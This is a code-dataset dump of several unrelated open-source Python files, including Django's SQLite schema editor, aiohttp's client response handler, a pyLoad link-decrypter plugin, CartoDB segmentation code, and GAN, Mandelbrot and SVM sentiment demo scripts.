repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
---|---|---|---|---|---|---|---|---|---|---|
diego-d5000/MisValesMd | env/lib/python2.7/site-packages/django/db/backends/sqlite3/schema.py | 1 | 11456 | import _sqlite3 # isort:skip
import codecs
import copy
from decimal import Decimal
from django.apps.registry import Apps
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.utils import six
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_delete_table = "DROP TABLE %(table)s"
sql_create_inline_fk = "REFERENCES %(to_table)s (%(to_column)s)"
def quote_value(self, value):
try:
value = _sqlite3.adapt(value)
except _sqlite3.ProgrammingError:
pass
# Manual emulation of SQLite parameter quoting
if isinstance(value, type(True)):
return str(int(value))
elif isinstance(value, (Decimal, float)):
return str(value)
elif isinstance(value, six.integer_types):
return str(value)
elif isinstance(value, six.string_types):
return "'%s'" % six.text_type(value).replace("\'", "\'\'")
elif value is None:
return "NULL"
elif isinstance(value, (bytes, bytearray, six.memoryview)):
# Bytes are only allowed for BLOB fields, encoded as string
# literals containing hexadecimal data and preceded by a single "X"
# character:
# value = b'\x01\x02' => value_hex = b'0102' => return X'0102'
value = bytes(value)
hex_encoder = codecs.getencoder('hex_codec')
value_hex, _length = hex_encoder(value)
# Use 'ascii' encoding for b'01' => '01', no need to use force_text here.
return "X'%s'" % value_hex.decode('ascii')
else:
raise ValueError("Cannot quote parameter value %r of type %s" % (value, type(value)))
def _remake_table(self, model, create_fields=[], delete_fields=[], alter_fields=[], override_uniques=None,
override_indexes=None):
"""
Shortcut to transform a model from old_model into new_model. Since SQLite
supports only a limited ALTER TABLE, the change is applied by creating a new
table with the updated schema, copying the rows across, deleting the old
table and renaming the new one into place.
"""
# Work out the new fields dict / mapping
body = {f.name: f for f in model._meta.local_fields}
# Since mapping might mix column names and default values,
# its values must be already quoted.
mapping = {f.column: self.quote_name(f.column) for f in model._meta.local_fields}
# This maps field names (not columns) for things like unique_together
rename_mapping = {}
# If any of the new or altered fields is introducing a new PK,
# remove the old one
restore_pk_field = None
if any(f.primary_key for f in create_fields) or any(n.primary_key for o, n in alter_fields):
for name, field in list(body.items()):
if field.primary_key:
field.primary_key = False
restore_pk_field = field
if field.auto_created:
del body[name]
del mapping[field.column]
# Add in any created fields
for field in create_fields:
body[field.name] = field
# Choose a default and insert it into the copy map
if not field.many_to_many:
mapping[field.column] = self.quote_value(
self.effective_default(field)
)
# Add in any altered fields
for (old_field, new_field) in alter_fields:
body.pop(old_field.name, None)
mapping.pop(old_field.column, None)
body[new_field.name] = new_field
if old_field.null and not new_field.null:
case_sql = "coalesce(%(col)s, %(default)s)" % {
'col': self.quote_name(old_field.column),
'default': self.quote_value(self.effective_default(new_field))
}
mapping[new_field.column] = case_sql
else:
mapping[new_field.column] = self.quote_name(old_field.column)
rename_mapping[old_field.name] = new_field.name
# Remove any deleted fields
for field in delete_fields:
del body[field.name]
del mapping[field.column]
# Remove any implicit M2M tables
if field.many_to_many and field.rel.through._meta.auto_created:
return self.delete_model(field.rel.through)
# Work inside a new app registry
apps = Apps()
# Provide isolated instances of the fields to the new model body
# Instantiating the new model with an alternate db_table will alter
# the internal references of some of the provided fields.
body = copy.deepcopy(body)
# Work out the new value of unique_together, taking renames into
# account
if override_uniques is None:
override_uniques = [
[rename_mapping.get(n, n) for n in unique]
for unique in model._meta.unique_together
]
# Work out the new value for index_together, taking renames into
# account
if override_indexes is None:
override_indexes = [
[rename_mapping.get(n, n) for n in index]
for index in model._meta.index_together
]
# Construct a new model for the new state
meta_contents = {
'app_label': model._meta.app_label,
'db_table': model._meta.db_table + "__new",
'unique_together': override_uniques,
'index_together': override_indexes,
'apps': apps,
}
meta = type("Meta", tuple(), meta_contents)
body['Meta'] = meta
body['__module__'] = model.__module__
temp_model = type(model._meta.object_name, model.__bases__, body)
# Create a new table with that format. We remove things from the
# deferred SQL that match our table name, too
self.deferred_sql = [x for x in self.deferred_sql if model._meta.db_table not in x]
self.create_model(temp_model)
# Copy data from the old table
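# The generated statement is roughly (illustrative table/column names):
#   INSERT INTO "app_model__new" ("id", "name") SELECT "id", "name" FROM "app_model"
# Note that the SELECT expressions come from `mapping`, so they may be quoted
# default literals (for newly created columns) or coalesce() expressions
# rather than plain column references.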
field_maps = list(mapping.items())
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(temp_model._meta.db_table),
', '.join(self.quote_name(x) for x, y in field_maps),
', '.join(y for x, y in field_maps),
self.quote_name(model._meta.db_table),
))
# Delete the old table
self.delete_model(model, handle_autom2m=False)
# Rename the new to the old
self.alter_db_table(temp_model, temp_model._meta.db_table, model._meta.db_table)
# Run deferred SQL on correct table
for sql in self.deferred_sql:
self.execute(sql.replace(temp_model._meta.db_table, model._meta.db_table))
self.deferred_sql = []
# Fix any PK-removed field
if restore_pk_field:
restore_pk_field.primary_key = True
def delete_model(self, model, handle_autom2m=True):
if handle_autom2m:
super(DatabaseSchemaEditor, self).delete_model(model)
else:
# Delete the table (and only that)
self.execute(self.sql_delete_table % {
"table": self.quote_name(model._meta.db_table),
})
def add_field(self, model, field):
"""
Creates a field on a model.
Usually involves adding a column, but may involve adding a
table instead (for M2M fields)
"""
# Special-case implicit M2M tables
if field.many_to_many and field.rel.through._meta.auto_created:
return self.create_model(field.rel.through)
self._remake_table(model, create_fields=[field])
def remove_field(self, model, field):
"""
Removes a field from a model. Usually involves deleting a column,
but for M2Ms may involve deleting a table.
"""
# M2M fields are a special case
if field.many_to_many:
# For implicit M2M tables, delete the auto-created table
if field.rel.through._meta.auto_created:
self.delete_model(field.rel.through)
# For explicit "through" M2M fields, do nothing
# For everything else, remake.
else:
# It might not actually have a column behind it
if field.db_parameters(connection=self.connection)['type'] is None:
return
self._remake_table(model, delete_fields=[field])
def _alter_field(self, model, old_field, new_field, old_type, new_type,
old_db_params, new_db_params, strict=False):
"""Actually perform a "physical" (non-ManyToMany) field update."""
# Alter by remaking table
self._remake_table(model, alter_fields=[(old_field, new_field)])
def alter_index_together(self, model, old_index_together, new_index_together):
"""
Deals with a model changing its index_together.
Note: The input index_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
"""
self._remake_table(model, override_indexes=new_index_together)
def alter_unique_together(self, model, old_unique_together, new_unique_together):
"""
Deals with a model changing its unique_together.
Note: The input unique_togethers must be doubly-nested, not the single-
nested ["foo", "bar"] format.
"""
self._remake_table(model, override_uniques=new_unique_together)
def _alter_many_to_many(self, model, old_field, new_field, strict):
"""
Alters M2Ms to repoint their to= endpoints.
"""
if old_field.rel.through._meta.db_table == new_field.rel.through._meta.db_table:
# The field name didn't change, but some options did; we have to propagate this altering.
self._remake_table(
old_field.rel.through,
alter_fields=[(
# We need the field that points to the target model, so we can tell alter_field to change it -
# this is m2m_reverse_field_name() (as opposed to m2m_field_name, which points to our model)
old_field.rel.through._meta.get_field(old_field.m2m_reverse_field_name()),
new_field.rel.through._meta.get_field(new_field.m2m_reverse_field_name()),
)],
override_uniques=(new_field.m2m_field_name(), new_field.m2m_reverse_field_name()),
)
return
# Make a new through table
self.create_model(new_field.rel.through)
# Copy the data across
self.execute("INSERT INTO %s (%s) SELECT %s FROM %s" % (
self.quote_name(new_field.rel.through._meta.db_table),
', '.join([
"id",
new_field.m2m_column_name(),
new_field.m2m_reverse_name(),
]),
', '.join([
"id",
old_field.m2m_column_name(),
old_field.m2m_reverse_name(),
]),
self.quote_name(old_field.rel.through._meta.db_table),
))
# Delete the old through table
self.delete_model(old_field.rel.through)
| mit | 8,917,223,311,476,454,000 | 43.102362 | 114 | 0.56669 | false |
AustereCuriosity/astropy | astropy/samp/tests/test_hub_proxy.py | 1 | 1178 | from ..hub_proxy import SAMPHubProxy
from ..hub import SAMPHubServer
from .. import conf
def setup_module(module):
conf.use_internet = False
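# Each test below starts an in-process SAMP hub and connects a proxy to it,
# then tears both down again, so no external hub or network access is needed.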
class TestHubProxy(object):
def setup_method(self, method):
self.hub = SAMPHubServer(web_profile=False, mode='multiple', pool_size=1)
self.hub.start()
self.proxy = SAMPHubProxy()
self.proxy.connect(hub=self.hub, pool_size=1)
def teardown_method(self, method):
if self.proxy.is_connected:
self.proxy.disconnect()
self.hub.stop()
def test_is_connected(self):
assert self.proxy.is_connected
def test_disconnect(self):
self.proxy.disconnect()
def test_ping(self):
self.proxy.ping()
def test_registration(self):
result = self.proxy.register(self.proxy.lockfile["samp.secret"])
self.proxy.unregister(result['samp.private-key'])
def test_custom_lockfile(tmpdir):
lockfile = tmpdir.join('.samptest').realpath().strpath
hub = SAMPHubServer(web_profile=False, lockfile=lockfile, pool_size=1)
hub.start()
proxy = SAMPHubProxy()
proxy.connect(hub=hub, pool_size=1)
hub.stop()
| bsd-3-clause | 5,713,479,540,355,891,000 | 21.653846 | 81 | 0.654499 | false |
fxia22/pointGAN | show_gan_rnn.py | 1 | 2043 | from __future__ import print_function
from show3d_balls import *
import argparse
import os
import random
import numpy as np
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.utils.data
import torchvision.datasets as dset
import torchvision.transforms as transforms
import torchvision.utils as vutils
from torch.autograd import Variable
from datasets import PartDataset
from pointnet import PointGen, PointGenR
import torch.nn.functional as F
import matplotlib.pyplot as plt
#showpoints(np.random.randn(2500,3), c1 = np.random.uniform(0,1,size = (2500)))
parser = argparse.ArgumentParser()
parser.add_argument('--model', type=str, default = '', help='model path')
opt = parser.parse_args()
print (opt)
gen = PointGenR()
gen.load_state_dict(torch.load(opt.model))
#sim_noise = Variable(torch.randn(5, 2, 20))
#
#sim_noises = Variable(torch.zeros(5, 15, 20))
#
#for i in range(15):
# x = i/15.0
# sim_noises[:,i,:] = sim_noise[:,0,:] * x + sim_noise[:,1,:] * (1-x)
#
#points = gen(sim_noises)
#point_np = points.transpose(2,1).data.numpy()
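# Interpolate between 5 random latent vectors: each of the 5 segments below
# blends one noise vector into the next over 30 steps, so the generated point
# clouds morph smoothly from one shape to the next (150 frames in total).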
sim_noise = Variable(torch.randn(5, 6, 20))
sim_noises = Variable(torch.zeros(5, 30 * 5,20))
for j in range(5):
for i in range(30):
x = (1-i/30.0)
sim_noises[:,i + 30 * j,:] = sim_noise[:,j,:] * x + sim_noise[:,(j+1) % 5,:] * (1-x)
points = gen(sim_noises)
point_np = points.transpose(2,1).data.numpy()
print(point_np.shape)
for i in range(150):
print(i)
frame = showpoints_frame(point_np[i])
plt.imshow(frame)
plt.axis('off')
plt.savefig('%s/%04d.png' %('out_rgan', i), bbox_inches='tight')
plt.clf()
#showpoints(point_np)
#sim_noise = Variable(torch.randn(5, 1000, 20))
#points = gen(sim_noise)
#point_np = points.transpose(2,1).data.numpy()
#print(point_np.shape)
#choice = np.random.choice(2500, 2048, replace=False)
#print(point_np[:, choice, :].shape)
#showpoints(point_np)
#np.savez('rgan.npz', points = point_np[:, choice, :])
| mit | -721,880,346,011,303,300 | 23.035294 | 92 | 0.675967 | false |
alex-eri/aiohttp-1 | aiohttp/client_proto.py | 1 | 6070 | import asyncio
import asyncio.streams
from .client_exceptions import (ClientOSError, ClientPayloadError,
ClientResponseError, ServerDisconnectedError)
from .http import HttpResponseParser, StreamWriter
from .streams import EMPTY_PAYLOAD, DataQueue
class ResponseHandler(DataQueue, asyncio.streams.FlowControlMixin):
"""Helper class to adapt between Protocol and StreamReader."""
def __init__(self, *, loop=None, **kwargs):
asyncio.streams.FlowControlMixin.__init__(self, loop=loop)
DataQueue.__init__(self, loop=loop)
self.paused = False
self.transport = None
self.writer = None
self._should_close = False
self._message = None
self._payload = None
self._payload_parser = None
self._reading_paused = False
self._timer = None
self._skip_status = ()
self._tail = b''
self._upgraded = False
self._parser = None
@property
def upgraded(self):
return self._upgraded
@property
def should_close(self):
if (self._payload is not None and
not self._payload.is_eof() or self._upgraded):
return True
return (self._should_close or self._upgraded or
self.exception() is not None or
self._payload_parser is not None or
len(self) or self._tail)
def close(self):
transport = self.transport
if transport is not None:
transport.close()
self.transport = None
return transport
def is_connected(self):
return self.transport is not None
def connection_made(self, transport):
self.transport = transport
self.writer = StreamWriter(self, transport, self._loop)
def connection_lost(self, exc):
if self._payload_parser is not None:
try:
self._payload_parser.feed_eof()
except Exception:
pass
try:
self._parser.feed_eof()
except Exception as e:
if self._payload is not None:
self._payload.set_exception(
ClientPayloadError('Response payload is not completed'))
if not self.is_eof():
if isinstance(exc, OSError):
exc = ClientOSError(*exc.args)
if exc is None:
exc = ServerDisconnectedError()
DataQueue.set_exception(self, exc)
self.transport = self.writer = None
self._should_close = True
self._parser = None
self._message = None
self._payload = None
self._payload_parser = None
self._reading_paused = False
super().connection_lost(exc)
def eof_received(self):
pass
def pause_reading(self):
if not self._reading_paused:
try:
self.transport.pause_reading()
except (AttributeError, NotImplementedError, RuntimeError):
pass
self._reading_paused = True
def resume_reading(self):
if self._reading_paused:
try:
self.transport.resume_reading()
except (AttributeError, NotImplementedError, RuntimeError):
pass
self._reading_paused = False
def set_exception(self, exc):
self._should_close = True
super().set_exception(exc)
def set_parser(self, parser, payload):
self._payload = payload
self._payload_parser = parser
if self._tail:
data, self._tail = self._tail, None
self.data_received(data)
def set_response_params(self, *, timer=None,
skip_payload=False,
skip_status_codes=(),
read_until_eof=False):
self._skip_payload = skip_payload
self._skip_status_codes = skip_status_codes
self._read_until_eof = read_until_eof
self._parser = HttpResponseParser(
self, self._loop, timer=timer,
payload_exception=ClientPayloadError,
read_until_eof=read_until_eof)
if self._tail:
data, self._tail = self._tail, b''
self.data_received(data)
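# Incoming bytes are routed one of three ways: through a custom payload parser
# (e.g. for websockets), buffered in self._tail while no parser is attached
# yet, or fed to the HTTP response parser, which yields (message, payload)
# pairs that are queued for the client.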
def data_received(self, data):
if not data:
return
# custom payload parser
if self._payload_parser is not None:
eof, tail = self._payload_parser.feed_data(data)
if eof:
self._payload = None
self._payload_parser = None
if tail:
self.data_received(tail)
return
else:
if self._upgraded or self._parser is None:
# i.e. websocket connection, websocket parser is not set yet
self._tail += data
else:
# parse http messages
try:
messages, upgraded, tail = self._parser.feed_data(data)
except BaseException as exc:
import traceback
traceback.print_exc()
self._should_close = True
self.set_exception(
ClientResponseError(code=400, message=str(exc)))
self.transport.close()
return
self._upgraded = upgraded
for message, payload in messages:
if message.should_close:
self._should_close = True
self._message = message
self._payload = payload
if (self._skip_payload or
message.code in self._skip_status_codes):
self.feed_data((message, EMPTY_PAYLOAD), 0)
else:
self.feed_data((message, payload), 0)
if upgraded:
self.data_received(tail)
else:
self._tail = tail
| apache-2.0 | 8,525,949,508,562,163,000 | 30.780105 | 77 | 0.531796 | false |
martinhbramwell/evalOfFlask | frmwk/forms/attic/demo_forms.py | 1 | 1202 | from flask.ext.wtf import Form, TextField, BooleanField, TextAreaField
from flask.ext.wtf import Required, Length
from flask.ext.babel import gettext
from frmwk.model.mdUser import User
class EditForm(Form):
nickname = TextField('nickname', validators = [Required()])
about_me = TextAreaField('about_me', validators = [Length(min = 0, max = 140)])
def __init__(self, original_nickname, *args, **kwargs):
Form.__init__(self, *args, **kwargs)
self.original_nickname = original_nickname
def validate(self):
if not Form.validate(self):
return False
if self.nickname.data == self.original_nickname:
return True
if self.nickname.data != User.make_valid_nickname(self.nickname.data):
self.nickname.errors.append(gettext('This nickname has invalid characters. Please use letters, numbers, dots and underscores only.'))
return False
user = User.query.filter_by(nickname = self.nickname.data).first()
if user != None:
self.nickname.errors.append(gettext('This nickname is already in use. Please choose another one.'))
return False
return True
| bsd-3-clause | 4,632,528,655,272,532,000 | 41.928571 | 145 | 0.65807 | false |
Zerknechterer/pyload | module/plugins/crypter/MultiloadCz.py | 1 | 1754 | # -*- coding: utf-8 -*-
import re
from module.plugins.internal.Crypter import Crypter
class MultiloadCz(Crypter):
__name__ = "MultiloadCz"
__type__ = "crypter"
__version__ = "0.41"
__pattern__ = r'http://(?:[^/]*\.)?multiload\.cz/(stahnout|slozka)/.+'
__config__ = [("use_subfolder" , "bool", "Save package to subfolder" , True),
("subfolder_per_pack", "bool", "Create a subfolder for each package" , True),
("usedHoster" , "str" , "Prefered hoster list (bar-separated)", "" ),
("ignoredHoster" , "str" , "Ignored hoster list (bar-separated)" , "" )]
__description__ = """Multiload.cz decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("zoidberg", "[email protected]")]
FOLDER_PATTERN = r'<form action="" method="get"><textarea.*?>([^>]*)</textarea></form>'
LINK_PATTERN = r'<p class="manager-server"><strong>([^<]+)</strong></p><p class="manager-linky"><a href="(.+?)">'
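# For folder URLs ("slozka") every link listed in the folder is queued; for
# single files the preferred-hoster list is tried first and the ignored-hoster
# list is only applied when no preferred mirror matched.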
def decrypt(self, pyfile):
self.html = self.load(pyfile.url, decode=True)
if re.match(self.__pattern__, pyfile.url).group(1) == "slozka":
m = re.search(self.FOLDER_PATTERN, self.html)
if m:
self.urls.extend(m.group(1).split())
else:
m = re.findall(self.LINK_PATTERN, self.html)
if m:
prefered_set = set(self.getConfig('usedHoster').split('|'))
self.urls.extend(x[1] for x in m if x[0] in prefered_set)
if not self.urls:
ignored_set = set(self.getConfig('ignoredHoster').split('|'))
self.urls.extend(x[1] for x in m if x[0] not in ignored_set)
| gpl-3.0 | -8,429,412,199,865,437,000 | 40.761905 | 117 | 0.530217 | false |
CartoDB/crankshaft | release/python/0.8.2/crankshaft/crankshaft/segmentation/segmentation.py | 1 | 8893 | """
Segmentation creation and prediction
"""
import numpy as np
from sklearn.ensemble import GradientBoostingRegressor
from sklearn import metrics
from sklearn.cross_validation import train_test_split
from crankshaft.analysis_data_provider import AnalysisDataProvider
# NOTE: the constructor takes an optional data_provider argument
class Segmentation(object):
"""
Gradient-boosting segmentation: trains a regression model on data pulled
through the data provider and predicts the target variable for new rows.
"""
def __init__(self, data_provider=None):
if data_provider is None:
self.data_provider = AnalysisDataProvider()
else:
self.data_provider = data_provider
def create_and_predict_segment_agg(self, target, features, target_features,
target_ids, model_parameters):
"""
Version of create_and_predict_segment that works on arrays that come
straight from the SQL calling the function.
Input:
@param target: The 1D array of length NSamples containing the
target variable we want the model to predict
@param features: The 2D array of size NSamples * NFeatures that
form the input to the model
@param target_ids: A 1D array of target_ids that will be used
to associate the results of the prediction with the rows which
they come from
@param model_parameters: A dictionary containing parameters for
the model.
"""
clean_target, _ = replace_nan_with_mean(target)
clean_features, _ = replace_nan_with_mean(features)
target_features, _ = replace_nan_with_mean(target_features)
model, accuracy = train_model(clean_target, clean_features,
model_parameters, 0.2)
prediction = model.predict(target_features)
accuracy_array = [accuracy] * prediction.shape[0]
return zip(target_ids, prediction, accuracy_array)
def create_and_predict_segment(self, query, variable, feature_columns,
target_query, model_params,
id_col='cartodb_id'):
"""
generate a segment with machine learning
Stuart Lynn
@param query: subquery that data is pulled from for packaging
@param variable: name of the target variable
@param feature_columns: list of column names
@param target_query: The query to run to obtain the data to predict
@param model_params: A dictionary of model parameters, the full
specification can be found on the
scikit learn page for [GradientBoostingRegressor]
(http://scikit-learn.org/stable/modules/generated/sklearn.ensemble.GradientBoostingRegressor.html)
"""
params = {"subquery": target_query,
"id_col": id_col}
(target, features, target_mean,
feature_means) = self.clean_data(query, variable, feature_columns)
model, accuracy = train_model(target, features, model_params, 0.2)
result = self.predict_segment(model, feature_columns, target_query,
feature_means)
accuracy_array = [accuracy] * result.shape[0]
rowid = self.data_provider.get_segmentation_data(params)
'''
rowid = [{'ids': [2.9, 4.9, 4, 5, 6]}]
'''
return zip(rowid[0]['ids'], result, accuracy_array)
def predict_segment(self, model, feature_columns, target_query,
feature_means):
"""
Use the provided model to predict the values for the new feature set
Input:
@param model: The pretrained model
@param feature_columns: A list of features to use in the
model prediction (list of column names)
@param target_query: The query to run to obtain the data to predict
on and the cartodb_ids associated with it.
"""
batch_size = 1000
params = {"subquery": target_query,
"feature_columns": feature_columns}
results = []
cursors = self.data_provider.get_segmentation_predict_data(params)
'''
cursors = [{'features': [[m1[0],m2[0],m3[0]],[m1[1],m2[1],m3[1]],
[m1[2],m2[2],m3[2]]]}]
'''
while True:
rows = cursors.fetch(batch_size)
if not rows:
break
batch = np.row_stack([np.array(row['features'])
for row in rows]).astype(float)
batch = replace_nan_with_mean(batch, feature_means)[0]
prediction = model.predict(batch)
results.append(prediction)
# NOTE: we removed the cartodb_ids calculation in here
return np.concatenate(results)
def clean_data(self, query, variable, feature_columns):
"""
Pulls the target and feature columns for the training query from the
data provider and replaces NaN entries with column means.
"""
params = {"subquery": query,
"target": variable,
"features": feature_columns}
data = self.data_provider.get_segmentation_model_data(params)
'''
data = [{'target': [2.9, 4.9, 4, 5, 6],
'feature1': [1,2,3,4], 'feature2' : [2,3,4,5]}]
'''
# extract target data from data_provider object
target = np.array(data[0]['target'], dtype=float)
# put n feature data arrays into an n x m array of arrays
features = np.column_stack([np.array(data[0][col])
for col in feature_columns]).astype(float)
features, feature_means = replace_nan_with_mean(features)
target, target_mean = replace_nan_with_mean(target)
return target, features, target_mean, feature_means
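# A minimal usage sketch (illustrative values only, not part of this module):
#   seg = Segmentation()
#   rows = seg.create_and_predict_segment_agg(
#       target, features, target_features, target_ids,
#       {'n_estimators': 100, 'learning_rate': 0.1})
# where the model parameters are passed straight to GradientBoostingRegressor.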
def replace_nan_with_mean(array, means=None):
"""
Input:
@param array: an array of floats which may have null-valued
entries
Output:
array with nans filled in with the mean of the dataset
"""
# returns an array of rows and column indices
nanvals = np.isnan(array)
indices = np.where(nanvals)
def loops(array, axis):
try:
return np.shape(array)[axis]
except IndexError:
return 1
ran = loops(array, 1)
if means is None:
means = {}
if ran == 1:
array = np.array(array)
means[0] = np.mean(array[~np.isnan(array)])
for row in zip(*indices):
array[row] = means[0]
else:
for col in range(ran):
means[col] = np.mean(array[~np.isnan(array[:, col]), col])
for row, col in zip(*indices):
array[row, col] = means[col]
else:
if ran == 1:
for row in zip(*indices):
array[row] = means[0]
else:
for row, col in zip(*indices):
array[row, col] = means[col]
return array, means
def train_model(target, features, model_params, test_split):
"""
Train the Gradient Boosting model on the provided data to calculate
the accuracy of the model
Input:
@param target: 1D Array of the variable that the model is to be
trained to predict
@param features: 2D Array NSamples *NFeatures to use in training
the model
@param model_params: A dictionary of model parameters, the full
specification can be found on the
scikit learn page for [GradientBoostingRegressor]
(http://scikit-learn.org/stable/modules/generated/sklearn.ensemble.GradientBoostingRegressor.html)
@param test_split: The fraction of the data to be withheld for
testing the model / calculating the accuracy
"""
features_train, features_test, \
target_train, target_test = train_test_split(features, target,
test_size=test_split)
model = GradientBoostingRegressor(**model_params)
model.fit(features_train, target_train)
accuracy = calculate_model_accuracy(model, features_test, target_test)
return model, accuracy
def calculate_model_accuracy(model, features_test, target_test):
"""
Calculate the mean squared error of the model prediction
Input:
@param model: model trained from input features
@param features_test: test features set to make prediction from
@param target_test: test target set to compare predictions to
Output:
mean squared error of the model prection compared target_test
"""
prediction = model.predict(features_test)
return metrics.mean_squared_error(prediction, target_test)
| bsd-3-clause | 7,995,125,924,327,904,000 | 38.004386 | 122 | 0.574834 | false |
openconfig/oc-pyang | openconfig_pyang/plugins/util/yangpath.py | 1 | 1676 | """Copyright 2016 The OpenConfig Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Utilities for manipulating YANG paths
"""
import re
def split_paths(path):
"""Return a list of path elements.
Args:
path: A YANG path string specified as /a/b
Returns:
A list of path components
"""
components = path.split("/")
return [c for c in components if c]
def strip_namespace(path):
"""Removes namespace prefixes from elements of the supplied path.
Args:
path: A YANG path string
Returns:
A YANG path string with the namespaces removed.
"""
re_ns = re.compile(r"^.+:")
path_components = [re_ns.sub("", comp) for comp in path.split("/")]
pathstr = "/".join(path_components)
return pathstr
def remove_last(path):
"""Removes the last path element and returns both parts.
Note the last '/' is not returned in either part.
Args:
path: A path string represented as a / separated string
Returns:
A tuple of:
0: the path with the last element removed (string)
1: the name of the last element (string)
"""
components = path.split("/")
last = components.pop()
prefix = "/".join(components)
return (prefix, last)
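# Worked examples (hypothetical paths):
#   strip_namespace('/oc-if:interfaces/oc-if:interface') -> '/interfaces/interface'
#   remove_last('/a/b/c') -> ('/a/b', 'c')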
| apache-2.0 | 9,101,595,041,839,160,000 | 24.014925 | 72 | 0.704057 | false |
rossant/galry | examples/mandelbrot.py | 1 | 1978 | """GPU-based interactive Mandelbrot fractal example."""
from galry import *
import numpy as np
import numpy.random as rdn
FSH = """
// take a position and a number of iterations, and
// returns the first iteration where the system escapes a box of size N.
int mandelbrot_escape(vec2 pos, int iterations)
{
vec2 z = vec2(0., 0.);
int n = 0;
int N = 10;
int N2 = N * N;
float r2 = 0.;
for (int i = 0; i < iterations; i++)
{
float zx = z.x * z.x - z.y * z.y + pos.x;
float zy = 2 * z.x * z.y + pos.y;
r2 = zx * zx + zy * zy;
if (r2 > N2)
{
n = i;
break;
}
z = vec2(zx, zy);
}
return n;
}
"""
FS = """
// this vector contains the coordinates of the current pixel
// varying_tex_coords contains a position in [0,1]^2
vec2 pos = vec2(-2.0 + 3. * varying_tex_coords.x,
-1.5 + 3. * varying_tex_coords.y);
// run mandelbrot system
int n = mandelbrot_escape(pos, iterations);
float c = log(float(n)) / log(float(iterations));
// compute the red value as a function of n
out_color = vec4(c, 0., 0., 1.);
"""
def get_iterations(zoom=1):
return int(500 * np.log(1 + zoom))
class MandelbrotVisual(TextureVisual):
def initialize_fragment(self):
self.add_fragment_header(FSH)
self.add_fragment_main(FS)
def base_mandelbrot(self, iterations=None):
if iterations is None:
iterations = get_iterations()
self.add_uniform("iterations", vartype="int", ndim=1, data=iterations)
def initialize(self, *args, **kwargs):
iterations = kwargs.pop('iterations', None)
super(MandelbrotVisual, self).initialize(*args, **kwargs)
self.base_mandelbrot(iterations)
def update(figure, parameter):
zoom = figure.get_processor('navigation').sx
figure.set_data(iterations=get_iterations(zoom))
figure(constrain_ratio=True,
constrain_navigation=True,)
visual(MandelbrotVisual)
# event('Pan', pan)
event('Zoom', update)
show() | bsd-3-clause | 5,936,480,683,851,878,000 | 24.701299 | 78 | 0.627401 | false |
textioHQ/pattern | examples/05-vector/06-svm.py | 1 | 4083 | from __future__ import print_function
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
import random
from pattern.db import Datasheet
from pattern_text.nl import tag, predicative
from pattern.vector import SVM, KNN, NB, count, shuffled
# This example demonstrates a Support Vector Machine (SVM).
# SVM is a robust classifier that uses "kernel" functions.
# See: http://www.clips.ua.ac.be/pages/pattern-vector#svm
#
# As a metaphor, imagine the following game:
# - The ground is scattered with red and blue marbles.
# - It is your task to separate them using a single, straight line.
#
# The separation is going to be a rough approximation, obviously.
#
# Now imagine the following game:
# - The room is filled with static, floating red and blue marbles.
# - It is your task to separate them by inserting a glass panel between them.
#
# The 3-D space gives a lot more options. Adding more dimensions adds even more options.
# This is roughly what an SVM does, using kernel functions to push the separation
# to a higher dimension.
# Pattern includes precompiled C binaries of libsvm.
# If these do not work on your system you have to compile libsvm manually.
# You can also change the "SVM()" statement below with "KNN()",
# so you can still follow the rest of the example.
classifier = SVM()
# We'll build a classifier to predict sentiment in Dutch movie reviews.
# For example, "geweldige film!" (great movie) indicates a positive sentiment.
# The CSV file at pattern/test/corpora/polarity-nl-bol.com.csv
# contains 1,500 positive and 1,500 negative reviews.
# The pattern.vector module has a shuffled() function
# which we use to randomly arrange the reviews in the list:
print("loading data...")
data = os.path.join(os.path.dirname(__file__), "..", "..",
"test", "corpora", "polarity-nl-bol.com.csv")
data = Datasheet.load(data)
data = shuffled(data)
# We do not necessarily need Document objects as in the previous examples.
# We can train any classifier on simple Python dictionaries too.
# This is sometimes easier if you want full control over the data.
# The instance() function below returns a train/test instance for a given review:
# 1) parse the review for part-of-speech tags,
# 2) keep adjectives, adverbs and exclamation marks (these mainly carry sentiment),
# 3) lemmatize the Dutch adjectives, e.g., "goede" => "goed" (good).
# 4) count the distinct words in the list, map it to a dictionary.
def instance(review): # "Great book!"
# [("Great", "JJ"), ("book", "NN"), ("!", "!")]
v = tag(review)
v = [word for (word, pos) in v if pos in ("JJ", "RB") or word in ("!")]
v = [predicative(word) for word in v] # ["great", "!", "!"]
v = count(v) # {"great": 1, "!": 1}
return v
# We can add any kind of features to a custom instance dict.
# For example, in a deception detection experiment
# we may want to populate the dict with PRP (pronouns), punctuation marks,
# average sentence length, a score for word diversity, etc.
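# A hypothetical sketch of such extra features (names are illustrative and not
# part of the pattern API):
#
#    def instance_extended(review):
#        v = instance(review)
#        v["n_words"] = len(review.split())       # crude sentence-length proxy
#        v["n_exclamations"] = review.count("!")
#        return v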
# Use 1,000 random instances as training material.
print("training...")
for score, review in data[:1000]:
classifier.train(instance(review), type=int(score) > 0)
# classifier.save("sentiment-nl-svm.p")
#classifier = SVM.load("sentiment-nl-svm.p")
# Use 500 random instances as test.
print("testing...")
i = n = 0
for score, review in data[1000:1500]:
if classifier.classify(instance(review)) == (int(score) > 0):
i += 1
n += 1
# The overall accuracy is around 82%.
# A Naieve Bayes classifier has about 78% accuracy.
# A KNN classifier has about 80% accuracy.
# Careful: to get a reliable score you need to calculate precision and recall,
# study the documentation at:
# http://www.clips.ua.ac.be/pages/pattern-metrics#accuracy
print(float(i) / n)
# The work is not done here.
# Low accuracy is disappointing, but high accuracy is often suspicious.
# Things to look out for:
# - distinction between train and test set,
# - overfitting: http://en.wikipedia.org/wiki/Overfitting
